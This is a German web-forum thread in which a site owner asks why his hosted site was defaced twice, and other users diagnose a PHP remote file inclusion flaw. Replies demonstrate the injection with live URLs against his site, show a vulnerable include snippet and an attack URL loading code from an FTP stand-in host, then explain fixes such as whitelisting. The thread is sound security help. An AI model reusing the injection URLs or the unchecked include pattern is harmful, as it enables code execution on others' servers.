luiggi: Lycos Webhosting. 2ter Hack

Hallo zusammen,
ich habe bei Lycos einen kleinen Webspace. Dieser wurde jetzt das zweite mal gehackt (jeweils eine neue Index aufgespielt).
Wie kann das denn sein? Braucht man da nicht die FTP Zugangsdaten? Wei weit geht da das Verschulden des Betreibers? Und wie weit meines (Wahl des Passwortes)?

Nur gut, dass ich von Lycos weg will, leider kann keine Kündigung vor November erfolgen.

Wer es sich anschauen will (habe die Datei umbenannt):
http://www.stefan-luger.de/_index.php

Schöne Grüße
Stefan

  1. Moin!

    ich habe bei Lycos einen kleinen Webspace. Dieser wurde jetzt das zweite mal gehackt (jeweils eine neue Index aufgespielt).
    Wie kann das denn sein? Braucht man da nicht die FTP Zugangsdaten? Wei weit geht da das Verschulden des Betreibers? Und wie weit meines (Wahl des Passwortes)?

    Schau dir einfach mal folgende URL an:

    http://www.stefan-luger.de/index.php?sldoc=http://www.rtbg.de/index.html

    Du siehst, dass in DEINE Seite die Inhalte MEINER Seite eingebaut werden.

    Nun habe ich lediglich HTML auf meiner Seite stehen, aber würde ich PHP-Code anzeigen, würde dieser ausgeführt werden.

    Mit anderen Worten: DU SELBST hast deine Webseite hackbar gemacht!

    Mutmaßlich benutzt du den Parameter, der die einzubindende PHP-Datei angibt, ungeprüft in einem include-Befehl! Genau das ist BÖSE!

    - Sven Rautenberg

    --
    My sssignature, my preciousssss!
    1. Hi Sven,
      danke für den Tipp, da muss ich nachbessern. (Einen Hinweis, wie ich das einfach machen kann? Oder muss ich alle erleubten Seiten hinterlegen?)

      Aber der andere hat eine Datei in mein Verzeichnis gespeichert, nicht den Aufruf verändert.

      Sg Stefan

      Moin!

      ich habe bei Lycos einen kleinen Webspace. Dieser wurde jetzt das zweite mal gehackt (jeweils eine neue Index aufgespielt).
      Wie kann das denn sein? Braucht man da nicht die FTP Zugangsdaten? Wei weit geht da das Verschulden des Betreibers? Und wie weit meines (Wahl des Passwortes)?

      Schau dir einfach mal folgende URL an:

      http://www.stefan-luger.de/index.php?sldoc=http://www.rtbg.de/index.html

      Du siehst, dass in DEINE Seite die Inhalte MEINER Seite eingebaut werden.

      Nun habe ich lediglich HTML auf meiner Seite stehen, aber würde ich PHP-Code anzeigen, würde dieser ausgeführt werden.

      Mit anderen Worten: DU SELBST hast deine Webseite hackbar gemacht!

      Mutmaßlich benutzt du den Parameter, der die einzubindende PHP-Datei angibt, ungeprüft in einem include-Befehl! Genau das ist BÖSE!

      • Sven Rautenberg
      1. Hallo,
        du könntest vor dem includieren deiner files abfragen ob diese auf deinem server existieren(file_exists...)

        MFG Hagen

        1. Hallo Hagen,

          Hallo,
          du könntest vor dem includieren deiner files abfragen ob diese auf deinem server existieren(file_exists...)

          Oder er könnte einfach file_wrapping ausschalten...

          Grüße aus Barsinghausen,
          Fabian

          --
          "It's easier not to be wise" - < http://www.fabian-transchel.de/kultur/philosophie/ialone/>
        2. Hallo Hagen,

          du könntest vor dem includieren deiner files abfragen ob diese auf deinem server existieren(file_exists...)

          Vorsicht - bei PHP-Versionen ab 5.0.0 reicht das nicht mehr! Bei diesen Versionen prüft file_exists() nämlich auch FTP-Pfade, womit der Angreifer über FTP schädlichen Code einschleusen könnte.

          Grüße aus Nürnberg
          Tobias

          1. Hallo Tobias,
            das versteh ich ehrlich gesagt net, ich habe meinetwegen einen ordner
            inc/ darin meine inc.php´s nun prüfe ich file_exists("blabla/inc/datei.inc.php") wie kann sich da noch ein anderes file reinschummeln???

            MFG hagen

            1. Hi,

              ich habe meinetwegen einen ordner inc/ darin meine inc.php´s nun prüfe ich file_exists("blabla/inc/datei.inc.php") wie kann sich da noch ein anderes file reinschummeln???

              solange du gezielt *in diesem Verzeichnis* nach der gefragten Datei suchst, ist ja alles in Ordnung. Falls du aber eine Konstruktion in der Art hast:

              $includefile = $_GET['page'];
               if (file_exists($includefile))
                  include $includefile;

              dann kann jemand über

              http://www.example.org/?page=ftp://meinftp.test/meinscript.php

              seinen eigenen Code bei dir einschleusen. Sobald du aber bei file_exists() selbst noch ein Verzeichnis voranstellst, etwa file_exists("./inc/".$includefile), dann bist du relativ sicher. Denn wenn jetzt jemand einen kompletten Pfad einschleust, wie ich es eben skizziert habe, ergibt das innerhalb von file_exists() einen ungültigen Pfad, und da kann nichts passieren.
              Jetzt verständlicher?

              Ciao,
               Martin

              --
              Alleine sind wir stark...
              gemeinsam sind wir unausstehlich!
              1. Jup Danke.
                MFG hagen

      2. hi,

        Aber der andere hat eine Datei in mein Verzeichnis gespeichert, nicht den Aufruf verändert.

        Wie Sven schon sagte:
        Es ist auf diese Weise ganz trivial möglich, PHP-Code von außerhalb auf deinem Server zur Ausführung zu bringen.

        Und PHP kann auch Dateien erstellen, beliebigen Inhalt hineinschreiben, etc.

        gruß,
        wahsaga

        --
        /voodoo.css:
        #GeorgeWBush { position:absolute; bottom:-6ft; }
      3. Moin!

        danke für den Tipp, da muss ich nachbessern. (Einen Hinweis, wie ich das einfach machen kann? Oder muss ich alle erleubten Seiten hinterlegen?)

        Du mußt erstmal verhindern, dass Seiten Code ausführen können.

        Jetzt, wo das gesamte Forum auf dein Problem aufmerksam wird, ist genau das dein größtes Problem, sonst siehst du innerhalb dieses Tages, was man noch alles hacken kann bei dir! Nimm deine Website offline, ersetze sie durch eine simple HTML-Seite, und bessere dein Skript nach.

        Mach das JETZT!

        Und dann reden wir mal über dein Skript.

        Aber der andere hat eine Datei in mein Verzeichnis gespeichert, nicht den Aufruf verändert.

        Weil er lieb war, und es ihm nur um das Defacement ging, hat er lediglich deine Startseite verändert.

        Wäre er böse, hätte er auf deiner Seite nichts geändert, sondern sie zum Versand von SPAM mißbraucht. Und DU wärst dann der Gearschte, der seinem Provider erklären dürfte, warum die sofort erfolgte Sperrung des Webspaces doch bitte rückgängig zu machen ist. Schadenersatzforderungen nicht auszuschließen.

        - Sven Rautenberg

        --
        My sssignature, my preciousssss!
        1. hallo,

          was bitte ist defacement?

          1. Hallo Freunde des gehobenen Forumsgenusses,

            was bitte ist defacement?

            Wikipedia: Defacement

            Gruß
            Alexander Brock

      4. Hell-O!

        danke für den Tipp, da muss ich nachbessern.

        Mannomann, nimm endlich die Seite vom Netz! Weißt du, wieviele Spaßvögel hier still mitlesen, die nicht nur deine Startseite überschreiben würden?

        Siechfred

        --
        Hier könnte Ihre Werbung stehen.
        Dark Millennium || Die neue 1%-Regelung
        1. Hi Siechfred!

          Mannomann, nimm endlich die Seite vom Netz! Weißt du, wieviele Spaßvögel hier still mitlesen, die nicht nur deine Startseite überschreiben würden?

          Und er gibt auch noch munter den Link zu einer anderen Stelle weiter, an der das Problem auch noch nicht behoben wurde.

          MfG H☼psel

          --
          "It's amazing I won. I was running against peace, prosperity, and incumbency."
          George W. Bush speaking to Swedish Prime Minister unaware a live television camera was still rolling, June 14, 2001
          Selfcode: ie:% fl:( br:> va:) ls:& fo:) rl:? n4:& ss:| de:] js:| ch:? sh:( mo:) zu:)
  2. hi,

    ich habe bei Lycos einen kleinen Webspace. Dieser wurde jetzt das zweite mal gehackt (jeweils eine neue Index aufgespielt).
    Wie kann das denn sein? Braucht man da nicht die FTP Zugangsdaten?

    Nein, man braucht nur einen Webseitenersteller, der absolut mangelhafte Scripte schreibt oder einsetzt.

    Wei weit geht da das Verschulden des Betreibers?

    Dem könnte man höchstens vorwerfen, dass allow_url_fopen aktiviert ist.
    Da dieses Feature aber harmlos _wäre_, wenn die Kunden wüssten, was sie tun, kann auch das eigentlich nicht zum Vorwurf gemacht werden.

    Und wie weit meines (Wahl des Passwortes)?

    Zu 99,9%.
    Aber nicht durch die Wahl des Passwortes, sondern durch mangelhafte Scripte.

    Ich schaue mir einen Link in der Form http://www.stefan-luger.de/index.php?sldoc=home.php an, und weiß gleich, dass du deine Inhalte höchstvermutlich einfach per include einbindest.

    Dann mal kurz zu schauen, ob sich da auch externe Inhalte einbinden lassen, ist auch ganz fix gemacht: http://www.stefan-luger.de/index.php?sldoc=http://www.heise.de
    Hoppla, was ist das denn - die Inhalte von heise.de in deine Seite integriert?

    Und wenn man jetzt noch davon ausgeht, dass du wirklich include zum Einbinden benutzt, PHP-Code in den eingebundenen Dateien oder Ressourcen also ebenfalls geparst werden würde - dann braucht man nur noch eine externe Ressource, die PHP-Code ausliefert, auf diese Weise in dein Script einbinden - und schon wird dieser PHP-Code auf deinem Server unter deinen Benutzerrechten ausgeführt.
    Also könnte man damit Dateien löschen, unbenennen, neue erstellen - ganz genauso, wie du es mit PHP auch könntest.

    Dieses Script solltest du also schnellstens offline nehmen, und es ausbessern.
    Z.B., in dem du erst mal eine Überprüfung des übergebenen Parameters einbaust - und nur, wenn dieser in einer Menge von dir definierter Werte liegt, bindest du die entsprechende Datei auch wirklich ein.

    gruß,
    wahsaga

    --
    /voodoo.css:
    #GeorgeWBush { position:absolute; bottom:-6ft; }
    1. Hallo,
      Ich überlege die ganze Zeit ob ICH Ihm im Rahmen von Schadensabwehr wenigstens seine Skripte lösche!
      Oder doch lieber den Provider informieren!
      Das was der Junge da treibt ist kreuzgefährlich!
      TomIRL

      1. Moin!

        Hallo,
        Ich überlege die ganze Zeit ob ICH Ihm im Rahmen von Schadensabwehr wenigstens seine Skripte lösche!
        Oder doch lieber den Provider informieren!
        Das was der Junge da treibt ist kreuzgefährlich!

        Eine .htaccess mit abwehrendem Inhalt sollte doch reichen, oder?

        Und vergiß den zweiten Webspace nicht, da ist dasselbe Drama zu sehen.

        - Sven Rautenberg

        --
        My sssignature, my preciousssss!
  3. Hallo,
    schau dir mal das hier an:

    http://www.phpforum.de/archiv_30671_Unsichere@Php@Skripte@massenhaft@ausgenutzt_anzeigen.html

    MFG Hagen

  4. Danke an alle,
    die mir hier eine Antwort/Meinung gegeben haben.

    Kam leider eben erst dazu, die Webseiten "auszuschalten".

    Komme evtl. mit weiteren Fragen zur Behebung des Problems auf das Forum zu.

    Sg Stefan